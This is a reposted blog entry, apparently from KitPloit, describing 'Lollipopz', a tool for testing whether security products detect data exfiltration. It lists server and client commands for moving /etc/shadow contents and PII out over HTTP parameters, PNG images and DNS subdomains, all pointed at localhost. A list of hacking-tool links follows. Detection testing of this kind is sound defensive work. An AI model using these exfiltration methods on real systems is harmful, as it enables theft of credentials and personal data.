Wednesday, April 15, 2020

Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities


Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server
$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

Client
# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server
# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r




via KitPloit

Related links


  1. Physical Pentest Tools
  2. Hack Tools For Ubuntu
  3. Hacker Tools Software
  4. Hacker Tools For Pc
  5. Pentest Tools Website
  6. Hacking Tools For Windows 7
  7. Best Hacking Tools 2019
  8. Hak5 Tools
  9. Hacker Techniques Tools And Incident Handling
  10. Hacking Tools For Kali Linux
  11. Hacker Tools Software
  12. Pentest Tools For Ubuntu
  13. Hack App
  14. Pentest Tools Nmap
  15. Hacker Tools Hardware
  16. Hacking Tools For Pc
  17. Beginner Hacker Tools
  18. Hack Tool Apk No Root
  19. Hacking App
  20. Pentest Tools Online
  21. Hak5 Tools

0 Comments:

Post a Comment

<< Home